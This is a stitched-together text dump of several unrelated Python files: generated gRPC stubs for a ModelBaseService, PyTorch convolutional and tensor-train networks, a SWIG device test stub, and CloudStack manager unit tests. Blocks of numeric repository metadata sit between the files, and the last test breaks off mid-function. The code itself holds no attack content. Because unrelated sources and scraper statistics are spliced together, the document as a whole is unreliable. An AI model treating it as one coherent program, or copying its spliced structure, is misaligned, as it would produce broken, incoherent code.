        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def UpdateById(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Update(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def UpdateDoc(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Insert(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')

    def Count(self, request, context):
        """Missing associated documentation comment in .proto file."""
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details('Method not implemented!')
        raise NotImplementedError('Method not implemented!')
def add_ModelBaseServiceServicer_to_server(servicer, server):
    """Register a ModelBaseServiceServicer's RPC handlers on ``server``.

    Generated by the gRPC Python protocol compiler plugin — DO NOT EDIT.
    Each handler deserializes an entity Request and serializes an entity
    Response (the mirror of the stub's direction).
    """
    rpc_method_handlers = {
            'GetById': grpc.unary_unary_rpc_method_handler(
                    servicer.GetById,
                    request_deserializer=entity_dot_request__pb2.Request.FromString,
                    response_serializer=entity_dot_response__pb2.Response.SerializeToString,
            ),
            'Get': grpc.unary_unary_rpc_method_handler(
                    servicer.Get,
                    request_deserializer=entity_dot_request__pb2.Request.FromString,
                    response_serializer=entity_dot_response__pb2.Response.SerializeToString,
            ),
            'GetList': grpc.unary_unary_rpc_method_handler(
                    servicer.GetList,
                    request_deserializer=entity_dot_request__pb2.Request.FromString,
                    response_serializer=entity_dot_response__pb2.Response.SerializeToString,
            ),
            'DeleteById': grpc.unary_unary_rpc_method_handler(
                    servicer.DeleteById,
                    request_deserializer=entity_dot_request__pb2.Request.FromString,
                    response_serializer=entity_dot_response__pb2.Response.SerializeToString,
            ),
            'Delete': grpc.unary_unary_rpc_method_handler(
                    servicer.Delete,
                    request_deserializer=entity_dot_request__pb2.Request.FromString,
                    response_serializer=entity_dot_response__pb2.Response.SerializeToString,
            ),
            'DeleteList': grpc.unary_unary_rpc_method_handler(
                    servicer.DeleteList,
                    request_deserializer=entity_dot_request__pb2.Request.FromString,
                    response_serializer=entity_dot_response__pb2.Response.SerializeToString,
            ),
            'ForceDeleteList': grpc.unary_unary_rpc_method_handler(
                    servicer.ForceDeleteList,
                    request_deserializer=entity_dot_request__pb2.Request.FromString,
                    response_serializer=entity_dot_response__pb2.Response.SerializeToString,
            ),
            'UpdateById': grpc.unary_unary_rpc_method_handler(
                    servicer.UpdateById,
                    request_deserializer=entity_dot_request__pb2.Request.FromString,
                    response_serializer=entity_dot_response__pb2.Response.SerializeToString,
            ),
            'Update': grpc.unary_unary_rpc_method_handler(
                    servicer.Update,
                    request_deserializer=entity_dot_request__pb2.Request.FromString,
                    response_serializer=entity_dot_response__pb2.Response.SerializeToString,
            ),
            'UpdateDoc': grpc.unary_unary_rpc_method_handler(
                    servicer.UpdateDoc,
                    request_deserializer=entity_dot_request__pb2.Request.FromString,
                    response_serializer=entity_dot_response__pb2.Response.SerializeToString,
            ),
            'Insert': grpc.unary_unary_rpc_method_handler(
                    servicer.Insert,
                    request_deserializer=entity_dot_request__pb2.Request.FromString,
                    response_serializer=entity_dot_response__pb2.Response.SerializeToString,
            ),
            'Count': grpc.unary_unary_rpc_method_handler(
                    servicer.Count,
                    request_deserializer=entity_dot_request__pb2.Request.FromString,
                    response_serializer=entity_dot_response__pb2.Response.SerializeToString,
            ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
            'grpc.ModelBaseService', rpc_method_handlers)
    server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class ModelBaseService(object):
    """Connection-less client for grpc.ModelBaseService (EXPERIMENTAL API).

    Generated by the gRPC Python protocol compiler plugin — DO NOT EDIT.
    Each static method issues a one-shot unary-unary call via
    grpc.experimental.unary_unary without requiring an explicit channel.
    """

    @staticmethod
    def GetById(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/GetById',
            entity_dot_request__pb2.Request.SerializeToString,
            entity_dot_response__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def Get(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/Get',
            entity_dot_request__pb2.Request.SerializeToString,
            entity_dot_response__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def GetList(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/GetList',
            entity_dot_request__pb2.Request.SerializeToString,
            entity_dot_response__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def DeleteById(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/DeleteById',
            entity_dot_request__pb2.Request.SerializeToString,
            entity_dot_response__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def Delete(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/Delete',
            entity_dot_request__pb2.Request.SerializeToString,
            entity_dot_response__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def DeleteList(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/DeleteList',
            entity_dot_request__pb2.Request.SerializeToString,
            entity_dot_response__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def ForceDeleteList(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/ForceDeleteList',
            entity_dot_request__pb2.Request.SerializeToString,
            entity_dot_response__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def UpdateById(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/UpdateById',
            entity_dot_request__pb2.Request.SerializeToString,
            entity_dot_response__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def Update(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/Update',
            entity_dot_request__pb2.Request.SerializeToString,
            entity_dot_response__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def UpdateDoc(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/UpdateDoc',
            entity_dot_request__pb2.Request.SerializeToString,
            entity_dot_response__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def Insert(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/Insert',
            entity_dot_request__pb2.Request.SerializeToString,
            entity_dot_response__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def Count(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/grpc.ModelBaseService/Count',
            entity_dot_request__pb2.Request.SerializeToString,
            entity_dot_response__pb2.Response.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 44.62645
| 103
| 0.651139
| 1,751
| 19,234
| 6.83438
| 0.058252
| 0.055653
| 0.049469
| 0.058745
| 0.89588
| 0.858778
| 0.858778
| 0.820674
| 0.816161
| 0.806635
| 0
| 0.005443
| 0.274098
| 19,234
| 430
| 104
| 44.730233
| 0.851669
| 0.056411
| 0
| 0.707775
| 1
| 0
| 0.078006
| 0.042191
| 0
| 0
| 0
| 0
| 0
| 1
| 0.069705
| false
| 0
| 0.008043
| 0.032172
| 0.117962
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1dae48fac017f983c3a95d54ffd078199530d99c
| 6,506
|
py
|
Python
|
Nets/Net.py
|
AndresOtero/TensorDecompositionMachineLearning
|
455f16b405ec9d031999b0ebf9c5a68d3c20b233
|
[
"MIT"
] | 3
|
2021-06-11T02:46:06.000Z
|
2021-08-17T02:59:30.000Z
|
Nets/Net.py
|
AndresOtero/TensorDecompositionMachineLearning
|
455f16b405ec9d031999b0ebf9c5a68d3c20b233
|
[
"MIT"
] | null | null | null |
Nets/Net.py
|
AndresOtero/TensorDecompositionMachineLearning
|
455f16b405ec9d031999b0ebf9c5a68d3c20b233
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
import torch.nn as nn
import torch.nn.functional as F
from Nets.TRNetShared import TRNetShared
from Nets.TTNetParallel import FeatureMap
from Nets.TTNetShared import TTNetShared
from Utils.TensorTools import flat_divisions, flat_divisions_with_batch
class FullyConnected(nn.Module):
    """Feature-map layer followed by a single linear classifier.

    The input is treated as ``amount_of_divisions`` segments of length n;
    FeatureMap lifts each segment to dimension m, and a linear layer maps
    the flattened result to 10 class log-probabilities.
    """

    def __init__(self, net_params):
        super(FullyConnected, self).__init__()
        self.amount_of_divisions = net_params.get_amount_of_divisions()
        self.m = net_params.get_m()
        self.n = net_params.get_n()
        # FeatureMap applies the same (n -> m) transform to every division.
        self.fc1 = FeatureMap(self.n, self.m, net_params.get_amount_of_divisions(), net_params.get_batch_size())
        self.fc2 = nn.Linear(self.m * self.amount_of_divisions, 10)

    def forward(self, x):
        x = self.fc1(x)
        # Flatten per-division features: assumes fc1 output reshapes cleanly
        # to (batch, divisions * m) -- TODO confirm FeatureMap's output shape.
        x = x.view(-1, self.m * self.amount_of_divisions)
        x = self.fc2(x)
        return F.log_softmax(x, dim=1)

    def get_number_of_parameters(self):
        # Count of trainable parameters only.
        return sum([p.numel() for p in self.parameters() if p.requires_grad])
class ConvolutionalNet(nn.Module):
    """Plain CNN classifier for (batch, 3, 32, 32) inputs (e.g. CIFAR-10).

    Three conv stages (3->32->64, 64->128->128, 128->256->256 channels),
    each ending in 2x2 max pooling, followed by a small fully connected
    head. Output is log-probabilities over 10 classes.
    """

    def __init__(self, net_params):
        # ``net_params`` is accepted only for interface parity with the other
        # nets in this module; this architecture is fully hard-coded.
        super(ConvolutionalNet, self).__init__()
        self.conv_layer = nn.Sequential(
            nn.Conv2d(in_channels=3, out_channels=32, kernel_size=3, padding=1),
            nn.BatchNorm2d(32),
            nn.ReLU(inplace=True),
            nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, padding=1),
            nn.ReLU(inplace=True),
            nn.MaxPool2d(kernel_size=2, stride=2),
            nn.Dropout2d(p=0.5),
            nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3, padding=1),
            nn.BatchNorm2d(128),
            nn.ReLU(inplace=True),
            nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1),
            nn.ReLU(inplace=True),
            nn.MaxPool2d(kernel_size=2, stride=2),
            nn.Dropout2d(p=0.05),
            nn.Conv2d(in_channels=128, out_channels=256, kernel_size=3, padding=1),
            nn.BatchNorm2d(256),
            nn.ReLU(inplace=True),
            nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
            nn.ReLU(inplace=True),
            nn.MaxPool2d(kernel_size=2, stride=2),
        )
        self.fc_layer = nn.Sequential(
            nn.Dropout(p=0.1),
            # 4096 = 256 channels * 4 * 4 after three 2x2 pools on 32x32 input.
            nn.Linear(4096, 32),
            nn.ReLU(inplace=True),
            nn.Dropout(p=0.1),
            nn.Linear(32, 10),
        )

    def forward(self, x):
        """Return per-class log-probabilities for a (batch, 3, 32, 32) input."""
        x = self.conv_layer(x)
        x = x.view(x.size(0), -1)  # flatten all feature maps per sample
        x = self.fc_layer(x)
        return F.log_softmax(x, dim=1)

    def get_number_of_parameters(self):
        """Count trainable parameters (requires_grad only)."""
        # Generator expression avoids materializing an intermediate list.
        return sum(p.numel() for p in self.parameters() if p.requires_grad)
class ConvolutionalNetWithTT(nn.Module):
    """CNN feature extractor followed by a shared tensor-train (TT) head.

    The convolutional trunk mirrors ConvolutionalNet; its output is
    reshaped to (batch, divisions, n) and classified by TTNetShared.
    """

    def __init__(self, net_params):
        super(ConvolutionalNetWithTT, self).__init__()
        self.conv_layer = nn.Sequential(
            # Conv Layer block 1
            nn.Conv2d(in_channels=3, out_channels=32, kernel_size=3, padding=1),
            nn.BatchNorm2d(32),
            nn.ReLU(inplace=True),
            nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, padding=1),
            nn.ReLU(inplace=True),
            nn.MaxPool2d(kernel_size=2, stride=2),
            nn.Dropout2d(p=0.5),
            # Conv Layer block 2
            nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3, padding=1),
            nn.BatchNorm2d(128),
            nn.ReLU(inplace=True),
            nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1),
            nn.ReLU(inplace=True),
            nn.MaxPool2d(kernel_size=2, stride=2),
            nn.Dropout2d(p=0.05),
            # Conv Layer block 3
            nn.Conv2d(in_channels=128, out_channels=256, kernel_size=3, padding=1),
            nn.BatchNorm2d(256),
            nn.ReLU(inplace=True),
            nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
            nn.ReLU(inplace=True),
            nn.MaxPool2d(kernel_size=2, stride=2),
        )
        self.tt = TTNetShared(net_params)
        self.row = net_params.get_divides_in_row()
        self.col = net_params.get_divides_in_col()
        self.divisions = net_params.get_amount_of_divisions()
        self.n = net_params.get_n()

    def forward(self, x):
        # Only the batch dimension is needed for the reshape (the original
        # unpacked and discarded the three spatial/channel dims).
        batch_size = x.size(0)
        features = self.conv_layer(x)
        # NOTE(review): assumes divisions * n equals the flattened conv output
        # size (256 * 4 * 4 for 32x32 inputs) -- confirm against net_params.
        grouped = features.view(batch_size, self.divisions, self.n)
        return self.tt(grouped)

    def get_number_of_parameters(self):
        """Count trainable parameters (requires_grad only)."""
        return sum(p.numel() for p in self.parameters() if p.requires_grad)
class ConvolutionalNetWithTR(nn.Module):
    """CNN feature extractor followed by a shared tensor-ring (TR) head.

    The convolutional trunk mirrors ConvolutionalNet; its output is
    reshaped to (batch, divisions, n) and classified by TRNetShared.
    """

    def __init__(self, net_params):
        super(ConvolutionalNetWithTR, self).__init__()
        self.conv_layer = nn.Sequential(
            # Conv Layer block 1
            nn.Conv2d(in_channels=3, out_channels=32, kernel_size=3, padding=1),
            nn.BatchNorm2d(32),
            nn.ReLU(inplace=True),
            nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3, padding=1),
            nn.ReLU(inplace=True),
            nn.MaxPool2d(kernel_size=2, stride=2),
            nn.Dropout2d(p=0.5),
            # Conv Layer block 2
            nn.Conv2d(in_channels=64, out_channels=128, kernel_size=3, padding=1),
            nn.BatchNorm2d(128),
            nn.ReLU(inplace=True),
            nn.Conv2d(in_channels=128, out_channels=128, kernel_size=3, padding=1),
            nn.ReLU(inplace=True),
            nn.MaxPool2d(kernel_size=2, stride=2),
            nn.Dropout2d(p=0.05),
            # Conv Layer block 3
            nn.Conv2d(in_channels=128, out_channels=256, kernel_size=3, padding=1),
            nn.BatchNorm2d(256),
            nn.ReLU(inplace=True),
            nn.Conv2d(in_channels=256, out_channels=256, kernel_size=3, padding=1),
            nn.ReLU(inplace=True),
            nn.MaxPool2d(kernel_size=2, stride=2),
        )
        self.tr = TRNetShared(net_params)
        self.row = net_params.get_divides_in_row()
        self.col = net_params.get_divides_in_col()
        self.divisions = net_params.get_amount_of_divisions()
        self.n = net_params.get_n()

    def forward(self, x):
        # Only the batch dimension is needed for the reshape (the original
        # unpacked and discarded the three spatial/channel dims).
        batch_size = x.size(0)
        features = self.conv_layer(x)
        # NOTE(review): assumes divisions * n equals the flattened conv output
        # size (256 * 4 * 4 for 32x32 inputs) -- confirm against net_params.
        grouped = features.view(batch_size, self.divisions, self.n)
        return self.tr(grouped)

    def get_number_of_parameters(self):
        """Count trainable parameters (requires_grad only)."""
        return sum(p.numel() for p in self.parameters() if p.requires_grad)
| 37.177143
| 112
| 0.614663
| 907
| 6,506
| 4.194046
| 0.110254
| 0.070978
| 0.064932
| 0.084911
| 0.851998
| 0.847266
| 0.810988
| 0.780231
| 0.73449
| 0.73449
| 0
| 0.055985
| 0.264218
| 6,506
| 174
| 113
| 37.390805
| 0.738667
| 0.017369
| 0
| 0.737226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.087591
| false
| 0
| 0.051095
| 0.029197
| 0.226277
| 0.007299
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
383b4c3a22a788def8e76cf6acb0bbe84a51d977
| 420
|
py
|
Python
|
test_vectors/SLSV_selfTests/testDevice.py
|
command-paul/slsv-master
|
a703bfaa8031e18e3fb74d3f1f2f4544c75a73ef
|
[
"BSD-3-Clause"
] | null | null | null |
test_vectors/SLSV_selfTests/testDevice.py
|
command-paul/slsv-master
|
a703bfaa8031e18e3fb74d3f1f2f4544c75a73ef
|
[
"BSD-3-Clause"
] | null | null | null |
test_vectors/SLSV_selfTests/testDevice.py
|
command-paul/slsv-master
|
a703bfaa8031e18e3fb74d3f1f2f4544c75a73ef
|
[
"BSD-3-Clause"
] | 1
|
2021-01-29T14:29:52.000Z
|
2021-01-29T14:29:52.000Z
|
# Python tests for the SWIG wrapped device class
from SLSV_test import TestClass as _TestClass
class testDevice(_TestClass):
    """Self-test stub for the SWIG-wrapped device class.

    Every phase is a no-op that reports success; this only verifies that
    the _TestClass interface can be subclassed and driven from Python.
    """
    def setup(self):
        # Nothing to prepare.
        return True
    def test(self):
        # No device behavior exercised yet.
        return True
    def getResult(self):
        # Unconditional pass.
        return True
class testDeviceInterface(_TestClass):
    """Self-test stub for the device-interface wrapper.

    Mirrors testDevice: all phases are no-ops that report success.
    """
    def setup(self):
        # Nothing to prepare.
        return True
    def test(self):
        # No interface behavior exercised yet.
        return True
    def getResult(self):
        # Unconditional pass.
        return True
| 20
| 48
| 0.657143
| 51
| 420
| 5.333333
| 0.431373
| 0.220588
| 0.308824
| 0.25
| 0.573529
| 0.573529
| 0.573529
| 0.573529
| 0.573529
| 0.573529
| 0
| 0
| 0.283333
| 420
| 20
| 49
| 21
| 0.903654
| 0.109524
| 0
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.066667
| 0.4
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
384357854c9f6a57ccc025691cd3d09ad0d601c5
| 20,044
|
py
|
Python
|
tests/test_cloudstack_manager.py
|
tsuru/varnishapi
|
d63a8c8c5f9c837855509fc5af59d8213c1c91d6
|
[
"BSD-3-Clause"
] | 3
|
2015-05-04T03:20:09.000Z
|
2016-02-19T10:35:35.000Z
|
tests/test_cloudstack_manager.py
|
tsuru/varnishapi
|
d63a8c8c5f9c837855509fc5af59d8213c1c91d6
|
[
"BSD-3-Clause"
] | 3
|
2015-01-02T13:18:56.000Z
|
2021-02-08T20:17:14.000Z
|
tests/test_cloudstack_manager.py
|
tsuru/varnishapi
|
d63a8c8c5f9c837855509fc5af59d8213c1c91d6
|
[
"BSD-3-Clause"
] | 5
|
2015-01-02T13:11:45.000Z
|
2016-08-26T06:14:35.000Z
|
# Copyright 2014 varnishapi authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import copy
import os
import unittest
import mock
from feaas import storage
from feaas.managers import cloudstack
class CloudStackManagerTestCase(unittest.TestCase):
def set_api_envs(self, url="http://cloudstackapi", api_key="key",
secret_key="secret"):
os.environ["CLOUDSTACK_API_URL"] = self.url = url
os.environ["CLOUDSTACK_API_KEY"] = self.api_key = api_key
os.environ["CLOUDSTACK_SECRET_KEY"] = self.secret_key = secret_key
def del_api_envs(self):
self._remove_envs("CLOUDSTACK_API_URL", "CLOUDSTACK_API_KEY",
"CLOUDSTACK_SECRET_KEY")
def set_vm_envs(self, template_id="abc123", zone_id="zone1",
service_offering_id="qwe123", project_id=None,
network_ids=None):
os.environ["CLOUDSTACK_TEMPLATE_ID"] = self.template_id = template_id
self.service_offering_id = service_offering_id
os.environ["CLOUDSTACK_SERVICE_OFFERING_ID"] = self.service_offering_id
os.environ["CLOUDSTACK_ZONE_ID"] = self.zone_id = zone_id
if project_id:
os.environ["CLOUDSTACK_PROJECT_ID"] = self.project_id = project_id
if network_ids:
os.environ["CLOUDSTACK_NETWORK_IDS"] = self.network_ids = network_ids
def del_vm_envs(self):
self._remove_envs("CLOUDSTACK_TEMPLATE_ID", "CLOUDSTACK_SERVICE_OFFERING_ID",
"CLOUDSTACK_ZONE_ID", "CLOUDSTACK_PROJECT_ID",
"CLOUDSTACK_NETWORK_IDS")
def _remove_envs(self, *envs):
for env in envs:
if env in os.environ:
del os.environ[env]
def test_init(self):
    # The manager must read its credentials from the environment and pass
    # them straight through to the underlying CloudStack client.
    self.set_api_envs()
    self.addCleanup(self.del_api_envs)
    client = cloudstack.CloudStackManager(storage=None)
    self.assertEqual(self.url, client.client.api_url)
    self.assertEqual(self.api_key, client.client.api_key)
    self.assertEqual(self.secret_key, client.client.secret)
def test_init_no_api_url(self):
    # Missing CLOUDSTACK_API_URL must fail fast with a clear message.
    with self.assertRaises(cloudstack.MissConfigurationError) as cm:
        cloudstack.CloudStackManager(storage=None)
    exc = cm.exception
    self.assertEqual(("env var CLOUDSTACK_API_URL is required",),
                     exc.args)
def test_init_no_api_key(self):
    # URL present but CLOUDSTACK_API_KEY missing must also fail fast.
    os.environ["CLOUDSTACK_API_URL"] = "something"
    with self.assertRaises(cloudstack.MissConfigurationError) as cm:
        cloudstack.CloudStackManager(storage=None)
    self.addCleanup(self.del_api_envs)
    exc = cm.exception
    self.assertEqual(("env var CLOUDSTACK_API_KEY is required",),
                     exc.args)
def test_init_no_secret_key(self):
    # URL and key present but CLOUDSTACK_SECRET_KEY missing must fail fast.
    os.environ["CLOUDSTACK_API_URL"] = "something"
    os.environ["CLOUDSTACK_API_KEY"] = "not_secret"
    with self.assertRaises(cloudstack.MissConfigurationError) as cm:
        cloudstack.CloudStackManager(storage=None)
    self.addCleanup(self.del_api_envs)
    exc = cm.exception
    self.assertEqual(("env var CLOUDSTACK_SECRET_KEY is required",),
                     exc.args)
@mock.patch("uuid.uuid4")
def test_start_instance(self, uuid):
    # Full happy path with both optional env settings (project + networks):
    # deploy a VM, poll the async job, look the VM up, and record a unit.
    self.set_api_envs()
    self.addCleanup(self.del_api_envs)
    self.set_vm_envs(project_id="project-123", network_ids="net-123")
    self.addCleanup(self.del_vm_envs)
    uuid.return_value = "uuid_val"
    instance = storage.Instance(name="some_instance", units=[])
    strg_mock = mock.Mock()
    strg_mock.retrieve_instance.return_value = instance
    client_mock = mock.Mock()
    client_mock.deployVirtualMachine.return_value = {"id": "abc123",
                                                     "jobid": "qwe321"}
    # jobstatus 1 == job finished successfully.
    client_mock.queryAsyncJobResult.return_value = {"jobstatus": 1}
    vm = {"id": "abc123", "nic": [{"ipaddress": "10.0.0.1"}]}
    client_mock.listVirtualMachines.return_value = {"virtualmachine": [vm]}
    client_mock.encode_user_data.return_value = user_data = mock.Mock()
    manager = cloudstack.CloudStackManager(storage=strg_mock)
    manager.client = client_mock
    got_instance = manager.start_instance("some_instance")
    self.assertEqual(instance, got_instance)
    self.assertEqual(1, len(instance.units))
    unit = instance.units[0]
    # The unit must carry the VM id, the uuid-based secret, the NIC address
    # and start in the "creating" state.
    self.assertEqual("abc123", unit.id)
    self.assertEqual("uuid_val", unit.secret)
    self.assertEqual(instance, unit.instance)
    self.assertEqual("10.0.0.1", unit.dns_name)
    self.assertEqual("creating", unit.state)
    strg_mock.retrieve_instance.assert_called_with(name="some_instance")
    # Deploy payload must include BOTH optional fields in this variant.
    create_data = {"group": "feaas", "templateid": self.template_id,
                   "zoneid": self.zone_id,
                   "serviceofferingid": self.service_offering_id,
                   "userdata": user_data, "networkids": self.network_ids,
                   "projectid": self.project_id}
    client_mock.deployVirtualMachine.assert_called_with(create_data)
    actual_user_data = manager.get_user_data("uuid_val")
    client_mock.encode_user_data.assert_called_with(actual_user_data)
@mock.patch("uuid.uuid4")
def test_start_instance_no_project_id(self, uuid):
    # Same flow as test_start_instance but WITHOUT CLOUDSTACK_PROJECT_ID:
    # the deploy payload must omit "projectid".
    self.set_api_envs()
    self.addCleanup(self.del_api_envs)
    self.set_vm_envs(network_ids="net-123")
    self.addCleanup(self.del_vm_envs)
    uuid.return_value = "uuid_val"
    instance = storage.Instance(name="some_instance", units=[])
    strg_mock = mock.Mock()
    strg_mock.retrieve_instance.return_value = instance
    client_mock = mock.Mock()
    client_mock.deployVirtualMachine.return_value = {"id": "abc123",
                                                     "jobid": "qwe321"}
    client_mock.queryAsyncJobResult.return_value = {"jobstatus": 1}
    vm = {"id": "abc123", "nic": [{"ipaddress": "10.0.0.1"}]}
    client_mock.listVirtualMachines.return_value = {"virtualmachine": [vm]}
    client_mock.encode_user_data.return_value = user_data = mock.Mock()
    manager = cloudstack.CloudStackManager(storage=strg_mock)
    manager.client = client_mock
    got_instance = manager.start_instance("some_instance")
    self.assertEqual(instance, got_instance)
    self.assertEqual(1, len(instance.units))
    unit = instance.units[0]
    self.assertEqual("abc123", unit.id)
    self.assertEqual("uuid_val", unit.secret)
    self.assertEqual(instance, unit.instance)
    self.assertEqual("10.0.0.1", unit.dns_name)
    self.assertEqual("creating", unit.state)
    strg_mock.retrieve_instance.assert_called_with(name="some_instance")
    # No "projectid" key expected here.
    create_data = {"group": "feaas", "templateid": self.template_id,
                   "zoneid": self.zone_id,
                   "serviceofferingid": self.service_offering_id,
                   "userdata": user_data, "networkids": self.network_ids}
    client_mock.deployVirtualMachine.assert_called_with(create_data)
    actual_user_data = manager.get_user_data("uuid_val")
    client_mock.encode_user_data.assert_called_with(actual_user_data)
@mock.patch("uuid.uuid4")
def test_start_instance_no_network_id(self, uuid):
self.set_api_envs()
self.addCleanup(self.del_api_envs)
self.set_vm_envs(project_id="proj-123")
self.addCleanup(self.del_vm_envs)
uuid.return_value = "uuid_val"
instance = storage.Instance(name="some_instance", units=[])
strg_mock = mock.Mock()
strg_mock.retrieve_instance.return_value = instance
client_mock = mock.Mock()
client_mock.deployVirtualMachine.return_value = {"id": "abc123",
"jobid": "qwe321"}
client_mock.queryAsyncJobResult.return_value = {"jobstatus": 1}
vm = {"id": "abc123", "nic": []}
client_mock.listVirtualMachines.return_value = {"virtualmachine": [vm]}
client_mock.encode_user_data.return_value = user_data = mock.Mock()
manager = cloudstack.CloudStackManager(storage=strg_mock)
manager.client = client_mock
got_instance = manager.start_instance("some_instance")
self.assertEqual(instance, got_instance)
self.assertEqual(1, len(instance.units))
unit = instance.units[0]
self.assertEqual("abc123", unit.id)
